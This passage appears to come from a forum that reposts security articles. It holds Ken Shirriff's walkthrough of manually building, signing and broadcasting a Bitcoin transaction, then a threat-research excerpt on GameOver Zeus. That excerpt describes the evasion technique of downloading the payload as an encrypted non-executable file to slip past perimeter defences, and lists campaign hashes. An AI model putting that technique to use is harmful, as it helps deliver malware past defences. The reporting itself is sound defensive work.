actually gets used. Bitcoin addresses and keys My first step was to create a Bitcoin address. Normally you use Bitcoin client software to create an address and the associated keys. However, I wrote some Python code to create the address, showing exactly what goes on behind the scenes. Bitcoin uses a variety of keys and addresses, so the following diagram may help explain them. You start by creating a random 256-bit private key. The private key is needed to sign a transaction and thus transfer (spend) bitcoins. Thus, the private key must be kept secret or else your bitcoins can be stolen. The Elliptic Curve DSA algorithm generates a 512-bit public key from the private key. (Elliptic curve cryptography will be discussed later.) This public key is used to verify the signature on a transaction. Inconveniently, the Bitcoin protocol adds a prefix of 04 to the public key. The public key is not revealed until a transaction is signed, unlike most systems where the public key is made public. 
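As a hedged stand-in for the key-pair step just described (the post's own snippets are only in its linked GitHub repository), the python-ecdsa library referenced in the post's notes can do it in a few lines:

```python
import os
import ecdsa

# 256-bit private key: 32 random bytes (a toy sketch; real wallets take more care
# over where their randomness comes from)
private_key = os.urandom(32)

# ECDSA over the secp256k1 curve turns it into a 512-bit public key
# (an x,y point made of two 256-bit coordinates)
sk = ecdsa.SigningKey.from_string(private_key, curve=ecdsa.SECP256k1)
public_key = b'\x04' + sk.get_verifying_key().to_string()   # Bitcoin's 04 prefix

print("private key:", private_key.hex())
print("public key :", public_key.hex())
```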
How bitcoin keys and addresses are related The next step is to generate the Bitcoin address that is shared with others. Since the 512-bit public key is inconveniently large, it is hashed down to 160 bits using the SHA-256 and RIPEM hash algorithms.[9] The key is then encoded in ASCII using Bitcoin's custom Base58Check encoding.[10] The resulting address, such as 1KKKK6N21XKo48zWKuQKXdvSsCf95ibHFa, is the address people publish in order to receive bitcoins. Note that you cannot determine the public key or the private key from the address. If you lose your private key (for instance by throwing out your hard drive), your bitcoins are lost forever. Finally, the Wallet Interchange Format key (WIF) is used to add a private key to your client wallet software. This is simply a Base58Check encoding of the private key into ASCII, which is easily reversed to obtain the 256-bit private key. To summarize, there are three types of keys: the private key, the public key, and the hash of the public key, and they are represented externally in ASCII using Base58Check encoding. The private key is the important key, since it is required to access the bitcoins and the other keys can be generated from it. The public key hash is the Bitcoin address you see published. I used the following code snippet[11] to generate a private key in WIF format and an address. The private key is simply a random 256-bit number. The ECDSA crypto library generates the public key from the private key.[12] The Bitcoin address is generated by SHA-256 hashing, RIPEM-160 hashing, and then Base58 encoding with checksum. Finally, the private key is encoded in Base58Check to generate the WIF encoding used to enter a private key into Bitcoin client software.[1] Inside a transaction A transaction is the basic operation in the Bitcoin system. You might expect that a transaction simply moves some bitcoins from one address to another address, but it's more complicated than that. A Bitcoin transaction moves bitcoins between one or more inputs and outputs. Each input is a transaction and address supplying bitcoins. Each output is an address receiving bitcoin, along with the amount of bitcoins going to that address. A sample Bitcoin transaction. Transaction C spends .008 bitcoins from Transactions A and B. The diagram above shows a sample transaction "C". In this transaction, .005 BTC are taken from an address in Transaction A, and .003 BTC are taken from an address in Transaction B. (Note that arrows are references to the previous outputs, so are backwards to the flow of bitcoins.) For the outputs, .003 BTC are directed to the first address and .004 BTC are directed to the second address. The leftover .001 BTC goes to the miner of the block as a fee. Note that the .015 BTC in the other output of Transaction A is not spent in this transaction. Each input used must be entirely spent in a transaction. If an address received 100 bitcoins in a transaction and you just want to spend 1 bitcoin, the transaction must spend all 100. The solution is to use a second output for change, which returns the 99 leftover bitcoins back to you. Transactions can also include fees. If there are any bitcoins left over after adding up the inputs and subtracting the outputs, the remainder is a fee paid to the miner. 
The fee isn't strictly required, but transactions without a fee will be a low priority for miners and may not be processed for days or may be discarded entirely.[13] A typical fee for a transaction is 0.0002 bitcoins (about 20 cents), so fees are low but not trivial. Manually creating a transaction For my experiment I used a simple transaction with one input and one output, which is shown below. I started by bying bitcoins from Coinbase and putting 0.00101234 bitcoins into address 1MMMMSUb1piy2ufrSguNUdFmAcvqrQF8M5, which was transaction 81b4c832.... My goal was to create a transaction to transfer these bitcoins to the address I created above, 1KKKK6N21XKo48zWKuQKXdvSsCf95ibHFa, subtracting a fee of 0.0001 bitcoins. Thus, the destination address will receive 0.00091234 bitcoins. Structure of the example Bitcoin transaction. Following the specification, the unsigned transaction can be assembled fairly easily, as shown below. There is one input, which is using output 0 (the first output) from transaction 81b4c832.... Note that this transaction hash is inconveniently reversed in the transaction. The output amount is 0.00091234 bitcoins (91234 is 0x016462 in hex), which is stored in the value field in little-endian form. The cryptographic parts - scriptSig and scriptPubKey - are more complex and will be discussed later. [TABLE=class: tx] [TR] [TD=colspan: 2]version[/TD] [TD]01 00 00 00[/TD] [/TR] [TR] [TD=colspan: 2]input count[/TD] [TD]01[/TD] [/TR] [TR] [TD]input[/TD] [TD=class: txindent]previous output hash (reversed)[/TD] [TD]48 4d 40 d4 5b 9e a0 d6 52 fc a8 25 8a b7 ca a4 25 41 eb 52 97 58 57 f9 6f b5 0c d7 32 c8 b4 81[/TD] [/TR] [TR] [TD=class: txindent]previous output index[/TD] [TD]00 00 00 00[/TD] [/TR] [TR] [TD=class: txindent]script length[/TD] [TD][/TD] [/TR] [TR] [TD=class: txindent]scriptSig[/TD] [TD]script containing signature[/TD] [/TR] [TR] [TD=class: txindent]sequence[/TD] [TD]ff ff ff ff[/TD] [/TR] [TR] [TD=colspan: 2]output count[/TD] [TD]01[/TD] [/TR] [TR] [TD]output[/TD] [TD=class: txindent]value[/TD] [TD]62 64 01 00 00 00 00 00[/TD] [/TR] [TR] [TD=class: txindent]script length[/TD] [TD][/TD] [/TR] [TR] [TD=class: txindent]scriptPubKey[/TD] [TD]script containing destination address[/TD] [/TR] [TR] [TD=colspan: 2]block lock time[/TD] [TD]00 00 00 00[/TD] [/TR] [/TABLE] Here's the code I used to generate this unsigned transaction. It's just a matter of packing the data into binary. Signing the transaction is the hard part, as you'll see next. How Bitcoin transactions are signed The following diagram gives a simplified view of how transactions are signed and linked together.[14] Consider the middle transaction, transferring bitcoins from address B to address C. The contents of the transaction (including the hash of the previous transaction) are hashed and signed with B's private key. In addition, B's public key is included in the transaction. By performing several steps, anyone can verify that the transaction is authorized by B. First, B's public key must correspond to B's address in the previous transaction, proving the public key is valid. (The address can easily be derived from the public key, as explained earlier.) Next, B's signature of the transaction can be verified using the B's public key in the transaction. These steps ensure that the transaction is valid and authorized by B. One unexpected part of Bitcoin is that B's public key isn't made public until it is used in a transaction. 
With this system, bitcoins are passed from address to address through a chain of transactions. Each step in the chain can be verified to ensure that bitcoins are being spent validly. Note that transactions can have multiple inputs and outputs in general, so the chain branches out into a tree. How Bitcoin transactions are chained together.[14] The Bitcoin scripting language You might expect that a Bitcoin transaction is signed simply by including the signature in the transaction, but the process is much more complicated. In fact, there is a small program inside each transaction that gets executed to decide if a transaction is valid. This program is written in Script, the stack-based Bitcoin scripting language. Complex redemption conditions can be expressed in this language. For instance, an escrow system can require two out of three specific users must sign the transaction to spend it. Or various types of contracts can be set up.[15] The Script language is surprisingly complex, with about 80 different opcodes. It includes arithmetic, bitwise operations, string operations, conditionals, and stack manipulation. The language also includes the necessary cryptographic operations (SHA-256, RIPEM, etc.) as primitives. In order to ensure that scripts terminate, the language does not contain any looping operations. (As a consequence, it is not Turing-complete.) In practice, however, only a few types of transactions are supported.[16] In order for a Bitcoin transaction to be valid, the two parts of the redemption script must run successfully. The script in the old transaction is called scriptPubKey and the script in the new transaction is called scriptSig. To verify a transaction, the scriptSig executed followed by the scriptPubKey. If the script completes successfully, the transaction is valid and the Bitcoin can be spent. Otherwise, the transaction is invalid. The point of this is that the scriptPubKey in the old transaction defines the conditions for spending the bitcoins. The scriptSig in the new transaction must provide the data to satisfy the conditions. In a standard transaction, the scriptSig pushes the signature (generated from the private key) to the stack, followed by the public key. Next, the scriptPubKey (from the source transaction) is executed to verify the public key and then verify the signature. As expressed in Script, the scriptSig is: PUSHDATA signature data and SIGHASH_ALL PUSHDATA public key data The scriptPubKey is: OP_DUP OP_HASH160 PUSHDATA Bitcoin address (public key hash) OP_EQUALVERIFY OP_CHECKSIG When this code executes, PUSHDATA first pushes the signature to the stack. The next PUSHDATA pushes the public key to the stack. Next, OP_DUP duplicates the public key on the stack. OP_HASH160 computes the 160-bit hash of the public key. PUSHDATA pushes the required Bitcoin address. Then OP_EQUALVERIFY verifies the top two stack values are equal - that the public key hash from the new transaction matches the address in the old address. This proves that the public key is valid. Next, OP_CHECKSIG checks that the signature of the transaction matches the public key and signature on the stack. This proves that the signature is valid. Signing the transaction I found signing the transaction to be the hardest part of using Bitcoin manually, with a process that is surprisingly difficult and error-prone. The basic idea is to use the ECDSA elliptic curve algorithm and the private key to generate a digital signature of the transaction, but the details are tricky. 
The signing process has been described through a 19-step process (more info). Click the thumbnail below for a detailed diagram of the process. The biggest complication is the signature appears in the middle of the transaction, which raises the question of how to sign the transaction before you have the signature. To avoid this problem, the scriptPubKey script is copied from the source transaction into the spending transaction (i.e. the transaction that is being signed) before computing the signature. Then the signature is turned into code in the Script language, creating the scriptSig script that is embedded in the transaction. It appears that using the previous transaction's scriptPubKey during signing is for historical reasons rather than any logical reason.[17] For transactions with multiple inputs, signing is even more complicated since each input requires a separate signature, but I won't go into the details. One step that tripped me up is the hash type. Before signing, the transaction has a hash type constant temporarily appended. For a regular transaction, this is SIGHASH_ALL (0x00000001). After signing, this hash type is removed from the end of the transaction and appended to the scriptSig. Another annoying thing about the Bitcoin protocol is that the signature and public key are both 512-bit elliptic curve values, but they are represented in totally different ways: the signature is encoded with DER encoding but the public key is represented as plain bytes. In addition, both values have an extra byte, but positioned inconsistently: SIGHASH_ALL is put after the signature, and type 04 is put before the public key. Debugging the signature was made more difficult because the ECDSA algorithm uses a random number.[18] Thus, the signature is different every time you compute it, so it can't be compared with a known-good signature. With these complications it took me a long time to get the signature to work. Eventually, though, I got all the bugs out of my signing code and succesfully signed a transaction. Here's the code snippet I used. The final scriptSig contains the signature along with the public key for the source address (1MMMMSUb1piy2ufrSguNUdFmAcvqrQF8M5). This proves I am allowed to spend these bitcoins, making the transaction valid. [TABLE=class: tx] [TR] [TD=colspan: 2]PUSHDATA 47[/TD] [TD]47[/TD] [/TR] [TR] [TD]signature (DER)[/TD] [TD]sequence[/TD] [TD]30[/TD] [/TR] [TR] [TD=class: txindent]length[/TD] [TD]44[/TD] [/TR] [TR] [TD=class: txindent]integer[/TD] [TD]02[/TD] [/TR] [TR] [TD=class: txindent2]length[/TD] [TD]20[/TD] [/TR] [TR] [TD=class: txindent2]X[/TD] [TD]2c b2 65 bf 10 70 7b f4 93 46 c3 51 5d d3 d1 6f c4 54 61 8c 58 ec 0a 0f f4 48 a6 76 c5 4f f7 13[/TD] [/TR] [TR] [TD=class: txindent]integer[/TD] [TD]02[/TD] [/TR] [TR] [TD=class: txindent2]length[/TD] [TD]20[/TD] [/TR] [TR] [TD=class: txindent2]Y[/TD] [TD] 6c 66 24 d7 62 a1 fc ef 46 18 28 4e ad 8f 08 67 8a c0 5b 13 c8 42 35 f1 65 4e 6a d1 68 23 3e 82[/TD] [/TR] [TR] [TD=class: txindent, colspan: 2]SIGHASH_ALL[/TD] [TD]01[/TD] [/TR] [TR] [TD=colspan: 2]PUSHDATA 41[/TD] [TD]41[/TD] [/TR] [TR] [TD]public key[/TD] [TD]type[/TD] [TD]04[/TD] [/TR] [TR] [TD]X[/TD] [TD]14 e3 01 b2 32 8f 17 44 2c 0b 83 10 d7 87 bf 3d 8a 40 4c fb d0 70 4f 13 5b 6a d4 b2 d3 ee 75 13[/TD] [/TR] [TR] [TD]Y[/TD] [TD] 10 f9 81 92 6e 53 a6 e8 c3 9b d7 d3 fe fd 57 6c 54 3c ce 49 3c ba c0 63 88 f2 65 1d 1a ac bf cd[/TD] [/TR] [/TABLE] The final scriptPubKey contains the script that must succeed to spend the bitcoins. 
Note that this script is executed at some arbitrary time in the future when the bitcoins are spent. It contains the destination address (1KKKK6N21XKo48zWKuQKXdvSsCf95ibHFa) expressed in hex, not Base58Check. The effect is that only the owner of the private key for this address can spend the bitcoins, so that address is in effect the owner. [TABLE=class: tx] [TR] [TD]OP_DUP[/TD] [TD]76[/TD] [/TR] [TR] [TD]OP_HASH160[/TD] [TD]a9[/TD] [/TR] [TR] [TD]PUSHDATA 14[/TD] [TD]14[/TD] [/TR] [TR] [TD=class: txindent]public key hash[/TD] [TD]c8 e9 09 96 c7 c6 08 0e e0 62 84 60 0c 68 4e d9 04 d1 4c 5c[/TD] [/TR] [TR] [TD]OP_EQUALVERIFY[/TD] [TD]88[/TD] [/TR] [TR] [TD]OP_CHECKSIG[/TD] [TD]ac[/TD] [/TR] [/TABLE] The final transaction Once all the necessary methods are in place, the final transaction can be assembled. The final transaction is shown below. This combines the scriptSig and scriptPubKey above with the unsigned transaction described earlier. [TABLE=class: tx] [TR] [TD=colspan: 2]version[/TD] [TD]01 00 00 00[/TD] [/TR] [TR] [TD=colspan: 2]input count[/TD] [TD]01[/TD] [/TR] [TR] [TD]input[/TD] [TD=class: txindent]previous output hash (reversed)[/TD] [TD]48 4d 40 d4 5b 9e a0 d6 52 fc a8 25 8a b7 ca a4 25 41 eb 52 97 58 57 f9 6f b5 0c d7 32 c8 b4 81[/TD] [/TR] [TR] [TD=class: txindent]previous output index[/TD] [TD]00 00 00 00[/TD] [/TR] [TR] [TD=class: txindent]script length[/TD] [TD]8a[/TD] [/TR] [TR] [TD=class: txindent]scriptSig[/TD] [TD]47 30 44 02 20 2c b2 65 bf 10 70 7b f4 93 46 c3 51 5d d3 d1 6f c4 54 61 8c 58 ec 0a 0f f4 48 a6 76 c5 4f f7 13 02 20 6c 66 24 d7 62 a1 fc ef 46 18 28 4e ad 8f 08 67 8a c0 5b 13 c8 42 35 f1 65 4e 6a d1 68 23 3e 82 01 41 04 14 e3 01 b2 32 8f 17 44 2c 0b 83 10 d7 87 bf 3d 8a 40 4c fb d0 70 4f 13 5b 6a d4 b2 d3 ee 75 13 10 f9 81 92 6e 53 a6 e8 c3 9b d7 d3 fe fd 57 6c 54 3c ce 49 3c ba c0 63 88 f2 65 1d 1a ac bf cd[/TD] [/TR] [TR] [TD=class: txindent]sequence[/TD] [TD]ff ff ff ff[/TD] [/TR] [TR] [TD=colspan: 2]output count[/TD] [TD]01[/TD] [/TR] [TR] [TD]output[/TD] [TD=class: txindent]value[/TD] [TD]62 64 01 00 00 00 00 00[/TD] [/TR] [TR] [TD=class: txindent]script length[/TD] [TD]19[/TD] [/TR] [TR] [TD=class: txindent]scriptPubKey[/TD] [TD]76 a9 14 c8 e9 09 96 c7 c6 08 0e e0 62 84 60 0c 68 4e d9 04 d1 4c 5c 88 ac[/TD] [/TR] [TR] [TD=colspan: 2]block lock time[/TD] [TD]00 00 00 00[/TD] [/TR] [/TABLE] A tangent: understanding elliptic curves Bitcoin uses elliptic curves as part of the signing algorithm. I had heard about elliptic curves before in the context of solving Fermat's Last Theorem, so I was curious about what they are. The mathematics of elliptic curves is interesting, so I'll take a detour and give a quick overview. The name elliptic curve is confusing: elliptic curves are not ellipses, do not look anything like ellipses, and they have very little to do with ellipses. An elliptic curve is a curve satisfying the fairly simple equation y^2 = x^3 + ax + b. Bitcoin uses a specific elliptic curve called secp256k1 with the simple equation y^2=x^3+7. [25] Elliptic curve formula used by Bitcoin. An important property of elliptic curves is that you can define addition of points on the curve with a simple rule: if you draw a straight line through the curve and it hits three points A, B, and C, then addition is defined by A+B+C=0. Due to the special nature of elliptic curves, addition defined in this way works "normally" and forms a group. With addition defined, you can define integer multiplication: e.g. 4A = A+A+A+A. 
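As a small, hedged illustration of that addition-based multiplication, using the same ecdsa library:

```python
import ecdsa

G = ecdsa.SECP256k1.generator   # the curve's standard base point
k = 12345678                    # toy secret multiplier (a real private key is 256 bits)
Q = G * k                       # repeated point addition, computed quickly via doubling

print(hex(Q.x()), hex(Q.y()))
# Going the other way, recovering k given only G and Q, is the hard direction
# discussed next; that asymmetry is what lets Q be published as a public key.
```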
What makes elliptic curves useful cryptographically is that it's fast to do integer multiplication, but division basically requires brute force. For example, you can compute a product such as 12345678*A = Q really quickly (by computing powers of 2), but if you only know A and Q solving n*A = Q is hard. In elliptic curve cryptography, the secret number 12345678 would be the private key and the point Q on the curve would be the public key. In cryptography, instead of using real-valued points on the curve, the coordinates are integers modulo a prime.[19] One of the surprising properties of elliptic curves is the math works pretty much the same whether you use real numbers or modulo arithmetic. Because of this, Bitcoin's elliptic curve doesn't look like the picture above, but is a random-looking mess of 256-bit points (imagine a big gray square of points). The Elliptic Curve Digital Signature Algorithm (ECDSA) takes a message hash, and then does some straightforward elliptic curve arithmetic using the message, the private key, and a random number[18] to generate a new point on the curve that gives a signature. Anyone who has the public key, the message, and the signature can do some simple elliptic curve arithmetic to verify that the signature is valid. Thus, only the person with the private key can sign a message, but anyone with the public key can verify the message. For more on elliptic curves, see the references[20]. Sending my transaction into the peer-to-peer network Leaving elliptic curves behind, at this point I've created a transaction and signed it. The next step is to send it into the peer-to-peer network, where it will be picked up by miners and incorporated into a block. How to find peers The first step in using the peer-to-peer network is finding a peer. The list of peers changes every few seconds, whenever someone runs a client. Once a node is connected to a peer node, they share new peers by exchanging addr messages whenever a new peer is discovered. Thus, new peers rapidly spread through the system. There's a chicken-and-egg problem, though, of how to find the first peer. Bitcoin clients solve this problem with several methods. Several reliable peers are registered in DNS under the name bitseed.xf2.org. By doing a nslookup, a client gets the IP addresses of these peers, and hopefully one of them will work. If that doesn't work, a seed list of peers is hardcoded into the client. [26] nslookup can be used to find Bitcoin peers. Peers enter and leave the network when ordinary users start and stop Bitcoin clients, so there is a lot of turnover in clients. The clients I use are unlikely to be operational right now, so you'll need to find new peers if you want to do experiments. You may need to try a bunch to find one that works. Talking to peers Once I had the address of a working peer, the next step was to send my transaction into the peer-to-peer network.[8] Using the peer-to-peer protocol is pretty straightforward. I opened a TCP connection to an arbitrary peer on port 8333, started sending messages, and received messages in turn. The Bitcoin peer-to-peer protocol is pretty forgiving; peers would keep communicating even if I totally messed up requests. The protocol consists of about 24 different message types. Each message is a fairly straightforward binary blob containing an ASCII command name and a binary payload appropriate to the command. The protocol is well-documented on the Bitcoin wiki. 
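Before looking at the version exchange, here is a hedged sketch of how each message is framed (magic number, 12-byte command, payload length and a 4-byte double-SHA-256 checksum, per the protocol documentation referenced above rather than the post's stripped-out code); the post's makeMessage helper, mentioned next, does the same job:

```python
import hashlib
import struct

MAGIC = 0xD9B4BEF9   # main-network magic constant

def make_message(command, payload):
    # header: magic, command padded to 12 bytes with NULs, payload length,
    # first 4 bytes of double-SHA-256(payload), then the payload itself
    checksum = hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4]
    return struct.pack('<L12sL4s', MAGIC, command, len(payload), checksum) + payload

# a "verack" has an empty payload, so it makes a handy smoke test
print(make_message(b'verack', b'').hex())
```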
The first step when connecting to a peer is to establish the connection by exchanging version messages. First I send a version message with my protocol version number[21], address, and a few other things. The peer sends its version message back. After this, nodes are supposed to acknowledge the version message with a verack message. (As I mentioned, the protocol is forgiving - everything works fine even if I skip the verack.) Generating the version message isn't totally trivial since it has a bunch of fields, but it can be created with a few lines of Python. makeMessage below builds an arbitrary peer-to-peer message from the magic number, command name, and payload. getVersionMessage creates the payload for a version message by packing together the various fields. Sending a transaction: tx I sent the transaction into the peer-to-peer network with the stripped-down Python script below. The script sends a version message, receives (and ignores) the peer's version and verack messages, and then sends the transaction as a tx message. The hex string is the transaction that I created earlier. The following screenshot shows how sending my transaction appears in the Wireshark network analysis program[22]. I wrote Python scripts to process Bitcoin network traffic, but to keep things simple I'll just use Wireshark here. The "tx" message type is visible in the ASCII dump, followed on the next line by the start of my transaction (01 00 ...). A transaction uploaded to Bitcoin, as seen in Wireshark. To monitor the progress of my transaction, I had a socket opened to another random peer. Five seconds after sending my transaction, the other peer sent me a tx message with the hash of the transaction I just sent. Thus, it took just a few seconds for my transaction to get passed around the peer-to-peer network, or at least part of it. Victory: my transaction is mined After sending my transaction into the peer-to-peer network, I needed to wait for it to be mined before I could claim victory. Ten minutes later my script received an inv message with a new block (see Wireshark trace below). Checking this block showed that it contained my transaction, proving my transaction worked. I could also verify the success of this transaction by looking in my Bitcoin wallet and by checking online. Thus, after a lot of effort, I had successfully created a transaction manually and had it accepted by the system. (Needless to say, my first few transaction attempts weren't successful - my faulty transactions vanished into the network, never to be seen again.[8]) A new block in Bitcoin, as seen in Wireshark. My transaction was mined by the large GHash.IO mining pool, into block #279068 with hash 0000000000000001a27b1d6eb8c405410398ece796e742da3b3e35363c2219ee. (The hash is reversed in inv message above: ee19...) Note that the hash starts with a large number of zeros - finding such a literally one in a quintillion value is what makes mining so difficult. This particular block contains 462 transactions, of which my transaction is just one. For mining this block, the miners received the reward of 25 bitcoins, and total fees of 0.104 bitcoins, approximately $19,000 and $80 respectively. I paid a fee of 0.0001 bitcoins, approximately 8 cents or 10% of my transaction. The mining process is very interesting, but I'll leave that for a future article. Bitcoin mining normally uses special-purpose ASIC hardware, designed to compute hashes at high speed. 
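One small detail worth calling out from the trace: hashes travel over the wire in little-endian byte order, which is why the block hash shows up reversed in the inv message. A quick sketch makes the correspondence explicit:

# Block hash as shown by block explorers (big-endian hex)
block_hash = "0000000000000001a27b1d6eb8c405410398ece796e742da3b3e35363c2219ee"
# Reversing the 32 bytes gives the form seen inside the inv payload (starts with ee19...)
wire_form = bytes.fromhex(block_hash)[::-1]
print(wire_form.hex())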
Photo credit: Gastev, CC:by Conclusion Using the raw Bitcoin protocol turned out to be harder than I expected, but I learned a lot about bitcoins along the way, and I hope you did too. My full code is available on GitHub.[23] My code is purely for demonstration - if you actually want to use bitcoins through Python, use a real library[24] rather than my code. Notes and references [1] The original Bitcoin client is Bitcoin-qt. In case you're wondering why qt, the client uses the common Qt UI framework. Alternatively you can use wallet software that doesn't participate in the peer-to-peer network, such as Armory or MultiBit. Or you can use an online wallet such as Blockchain.info. [2] A couple good articles on Bitcoin are How it works and the very thorough How the Bitcoin protocol actually works. [3] The original Bitcoin paper is Bitcoin: A Peer-to-Peer Electronic Cash System written by the pseudonymous Satoshi Nakamoto in 2008. The true identity of Satoshi Nakamoto is unknown, although there are many theories. [4] You may have noticed that sometimes Bitcoin is capitalized and sometimes not. It's not a problem with my shift key - the "official" style is to capitalize Bitcoin when referring to the system, and lower-case bitcoins when referring to the currency units. [5] In case you're wondering how the popular MtGox Bitcoin exchange got its name, it was originally a trading card exchange called "Magic: The Gathering Online Exchange" and later took the acronym as its name. [6] For more information on what data is in the blockchain, see the very helpful article Bitcoin, litecoin, dogecoin: How to explore the block chain. [7] I'm not the only one who finds the Bitcoin transaction format inconvenient. For a rant on how messed up it is, see Criticisms of Bitcoin's raw txn format. [8] You can also generate transaction and send raw transactions into the Bitcoin network using the bitcoin-qt console. Type sendrawtransaction a1b2c3d4.... This has the advantage of providing information in the debug log if the transaction is rejected. If you just want to experiment with the Bitcoin network, this is much, much easier than my manual approach. [9] Apparently there's no solid reason to use RIPEM-160 hashing to create the address and SHA-256 hashing elsewhere, beyond a vague sense that using a different hash algorithm helps security. See discussion. Using one round of SHA-256 is subject to a length extension attack, which explains why double-hashing is used. [10] The Base58Check algorithm is documented on the Bitcoin wiki. It is similar to base 64 encoding, except it omits the O, 0, I, and l characters to avoid ambiguity in printed text. A 4-byte checksum guards against errors, since using an erroneous bitcoin address will cause the bitcoins to be lost forever. [11] Some boilerplate has been removed from the code snippets. For the full Python code, see GitHub. You will also need the ecdsa cryptography library. [12] You may wonder how I ended up with addresses with nonrandom prefixes such as 1MMMM. The answer is brute force - I ran the address generation script overnight and collected some good addresses. (These addresses made it much easier to recognize my transactions in my testing.) There are scripts and websites that will generate these "vanity" addresses for you. [13] For a summary of Bitcoin fees, see bitcoinfees.com. This recent Reddit discussion of fees is also interesting. [14] The original Bitcoin paper has a similar figure showing how transactions are chained together. 
I find it very confusing though, since it doesn't distinguish between the address and the public key. [15] For details on the different types of contracts that can be set up with Bitcoin, see Contracts. One interesting type is the 2-of-3 escrow transaction, where two out of three parties must sign the transaction to release the bitcoins. Bitrated is one site that provides these. [16] Although Bitcoin's Script language is very flexible, the Bitcoin network only permits a few standard transaction types and non-standard transactions are not propagated (details). Some miners will accept non-standard transactions directly, though. [17] There isn't a security benefit from copying the scriptPubKey into the spending transaction before signing since the hash of the original transaction is included in the spending transaction. For discussion, see Why TxPrev.PkScript is inserted into TxCopy during signature check? [18] The random number used in the elliptic curve signature algorithm is critical to the security of signing. Sony used a constant instead of a random number in the PlayStation 3, allowing the private key to be determined. In an incident related to Bitcoin, a weakness in the random number generator allowed bitcoins to be stolen from Android clients. [19] For Bitcoin, the coordinates on the elliptic curve are integers modulo the prime 2^256 - 2^32 - 2^9 - 2^8 - 2^7 - 2^6 - 2^4 - 1, which is very nearly 2^256. This is why the keys in Bitcoin are 256-bit keys. [20] For information on the historical connection between elliptic curves and ellipses (the equation turns up when integrating to compute the arc length of an ellipse) see the interesting article Why Ellipses Are Not Elliptic Curves, Adrian Rice and Ezra Brown, Mathematics Magazine, vol. 85, 2012, pp. 163-176. For more introductory information on elliptic curve cryptography, see ECC tutorial or A (Relatively Easy To Understand) Primer on Elliptic Curve Cryptography. For more on the mathematics of elliptic curves, see An Introduction to the Theory of Elliptic Curves by Joseph H. Silverman. Three Fermat trails to elliptic curves includes a discussion of how Fermat's Last Theorem was solved with elliptic curves. [21] There doesn't seem to be documentation on the different Bitcoin protocol versions other than the code. I'm using version 60002 somewhat arbitrarily. [22] The Wireshark network analysis software can dump out most types of Bitcoin packets, but only if you download a recent beta release - I'm using version 1.11.2. [23] The full code for my examples is available on GitHub. [24] Several Bitcoin libraries in Python are bitcoin-python, pycoin, and python-bitcoinlib. [25] The elliptic curve plot was generated from the Sage mathematics package: var("x y") implicit_plot(y^2-x^3-7, (x,-10, 10), (y,-10, 10), figsize=3, title="y^2=x^3+7") [26] The hardcoded peer list in the Bitcoin client is in chainparams.cpp in the array pnseed. For more information on finding Bitcoin peers, see How Bitcoin clients find each other or Satoshi client node discovery. Posted by Ken Shirriff at 8:47 AM Sursa: Ken Shirriff's blog: Bitcoins the hard way: Using the raw Bitcoin protocol
-
GameOver Zeus now uses Encryption to bypass Perimeter Security The criminals behind the malware delivery system for GameOver Zeus have a new trick. Encrypting their EXE file so that as it passes through your firewall, webfilters, network intrusion detection systems and any other defenses you may have in place, it is doing so as a non-executable ".ENC" file. If you are in charge of network security for your Enterprise, you may want to check your logs to see how many .ENC files have been downloaded recently. Malcovery Security's malware analyst Brendan Griffin let me know about this new behavior on January 27, 2014, and has seen it consistently since that time. On February 1st, I reviewed the reports that Malcovery's team produced and decided that this was a trend we needed to share more broadly than just to the subscribers of our "Today's Top Threat" reports. Subscribers would have been alerted to each of these campaigns, often within minutes of the beginning of the campaign. We sent copies of all the malware below to dozens of security researchers and to law enforcement. We also made sure that we had uploaded all of these files to VirusTotal which is a great way to let "the industry" know about new malware. I am grateful to William MacArthur of GoDaddy, Brett Stone-Gross of Dell Secure Works, and Boldizsár Bencsáth from CrySys Lab in Hungary who were three researchers who jumped in to help look at this with us. Hopefully others will share insights as well, so this will be an on-going conversation. To review the process, Cutwail is a spamming botnet that since early fall 2013 has been primarily distributing UPATRE malware via Social Engineering. The spam message is designed to convince the recipient that it would be appropriate for them to open the attached .zip file. These .zip files contain a small .exe file whose primary job is to go out to the Internet and download larger more sophisticated malware that would never pass through spam filters without causing alarm, but because of the way our perimeter security works, are often allowed to be downloaded by a logged in user from their workstation. As our industry became better at detecting these downloads, the criminals have had a slightly more difficult time infecting people. With the change last week, the new detection rate for the Zeus downloads has consistently been ZERO of FIFTY at VirusTotal. (For example, here is the "Ring Central" .enc file from Friday on VirusTotal -- al3101.enc. Note the timestamp. That was a rescan MORE THAN TWENTY-FOUR HOURS AFTER INITIAL DISTRIBUTION, and it still says 0 of 50. Why? Well, because technically, it isn't malware. It doesn't actually execute! All Windows EXE files start with the bytes "MZ". These files start with "ZZP". They aren't executable, so how could they be malware? Except they are. In the new delivery model, the .zip file attached to the email has a NEW version of UPATRE that first downloads the .enc file from the Internet and then DECRYPTS the file, placing it in a new location with a new filename, and then causing it both to execute and to be scheduled to execute in the future. UPATRE campaigns that use Encryption to Bypass Security Here are the campaigns we saw this week, with the hashes and sizes for the .zip, the UPATRE .exe, the .enc file, and the decrypted GameOver Zeus .exe file that came from that file. 
For each campaign, you will see some information about the spam message, including the .zip file that was attached and its size and hash, and the .exe file that was unpacked from that .zip file. Then you will see a screenshot of the email message, followed by the URL that the Encrypted GameOver Zeus file was downloaded from, and some statistics about the file AFTER it was decrypted. ALL OF THESE SPAM CAMPAIGNS ARE RELATED TO EACH OTHER! They are all being distributed by the criminals behind the Cutwail malware delivery infrastructure. It is likely that many different criminals are paying to use this infrastructure. [TABLE] [TR] [TD]Campaign: 2014-01-27.ADP[/TD] [TD]Messages Seen: 2606[/TD] [TD]Subject: Invoice #(RND)[/TD] [/TR] [TR] [TD]From: ADP - Payroll Services[/TD] [TD]payroll.invoices@adp.com[/TD] [/TR] [TR] [TD]Invoice.zip[/TD] [TD]9767 bytes[/TD] [TD]b624601794380b2bee0769e09056769c[/TD] [/TR] [TR] [TD]Invoice.PDF.exe[/TD] [TD]18944 bytes[/TD] [TD]8d3bf40cfbcf03ed13f0a900726170b3 [/TD] [/TR] [TR] [/TR] [/TABLE] Sursa: CyberCrime & Doing Time: GameOver Zeus now uses Encryption to bypass Perimeter Security
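As a quick aside for defenders, a crude first-pass triage of suspicious downloads can simply look at the magic bytes described above; the script below is only a sketch based on the "MZ"/"ZZP" markers reported here, and real samples obviously need proper analysis:

import sys

def classify(path):
    with open(path, "rb") as f:
        magic = f.read(3)
    if magic[:2] == b"MZ":
        return "normal PE executable"
    if magic == b"ZZP":
        return "possible UPATRE-encrypted payload (.enc)"
    return "other"

for name in sys.argv[1:]:
    print(name, "->", classify(name))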
-
